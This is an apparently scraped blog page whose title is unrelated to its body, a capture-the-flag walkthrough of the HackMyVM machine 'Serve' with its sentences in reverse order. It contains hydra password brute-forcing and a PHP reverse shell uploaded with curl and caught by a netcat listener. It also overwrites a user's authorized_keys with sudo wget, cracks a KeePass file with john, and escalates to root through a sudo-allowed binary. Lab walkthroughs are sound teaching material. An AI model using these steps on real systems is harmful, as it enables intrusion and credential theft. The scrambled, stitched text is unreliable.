bionmai.blogg.se

Keeweb replace logout





This means that it uses the “less” utility if the content overflows. It looked like it uses bropages which I found out to be similar to the man pages. cat `which bro` The content of the binary The binary was a Ruby script and I opened it to see the content. The binary bro is on sudo permissions file `which bro` Now, to get root privileges, I checked the sudo permissions once again. ssh The shell of teo Root privilege escalation Then, I could do SSH as the user from my local machine. sudo -u teo wget -O /home/teo/.ssh/authorized_keys On the target machine, I copied the file as follows. On my local machine, I did the following. Thus, I served my SSH public key and copied it to authorized_keys on the. Upon checking the sudo permissions of www-data, we find that it can execute “wget” as the user “teo”. Upgrade to an intelligent reverse shell Switch shell to teo From this onward, the steps are quite easy. nc -nlvp 9001 Finally, I hit the shell to get the reverse connection. But first, I uploaded the shell.php using curl. Also, I changed the IP address to that of mine and the port to 9001 that I would be listening to. I have copied the pentestmonkey’s shell from and put it in the current directory as shell.php. Since this is WebDAV, we can upload a PHP shell and get the reverse shell. hydra -l admin -P dict.txt http-get://10.0.0.104/webdav/ Hydra cracks the password for the user admin Spawn a reverse shell Now that I had the wordlist, I simply performed a brute-force attack using hydra. Then, I copied them to a file using bash. I wrote a simple Python script that would print all the possibilities of the numbers from 000 to 999 as follows. keepass2 db.kdbx -pw: The password of the file using keepass2 binary The UI of the website As the note said, there are XXX to replace with numbers. john dbhash -show The password of the db.kdbx file john dbhash -wordlist=/home/kali/rockyou.txt Thus, we must first crack the password that is required to open the file.
But before this, we should know that these services have a master password to store the password. However, we can open this on the website “ “. Now, to open the file, we can install a “keepass2” binary in Kali Linux. Luckily, I found the “db.kdbx” file that might have the credentials. gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u -x kdbx -o dir-common-secrets-kdbx.log /db.kdbx is on the /secrets/ path Thus, I enumerated the files with that extension in the path /secrets. The only password manager that I knew stored credentials in the database was KeePass, whose extension is kdbx. Furthermore, we have to find the correct employee number to replace the “X”s in the found credentials. Similarly, the database with the credentials to access the resource is in the secret directory. In the notes.txt file, we find a username of the machine. The content of the notes.txt is as follows.


However, there is protection on the path and hence we require credentials for that. So, if the path does what it means by name, then we can upload files to the server. gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u -x php,txt,html -o dir-common.log The gobuster scan results From the results, we see that there is a note that the author wants us to look at. Thus, I performed a gobuster directory enumeration. The home page contains the default Apache page. nmap -v -T4 -p- -sC -sV -oN nmap.log 10.0.0.104 The Nmap scan results Next, I checked the open ports on the target that we can interact with.


fping -aqg 10.0.0.0/24 The IP address of the target is 10.0.0.104 Scan open ports However, if you are running it in headless mode, you can do a ping scan as follows. The author of the machine has put the IP address on the login screen of the machine. Link to the machine: Identify the IP address It’s a bit tricky to get the foothold but the remaining steps are pretty easy. Serve is an easy machine from the HackMyVM platform by d4t4s3c.






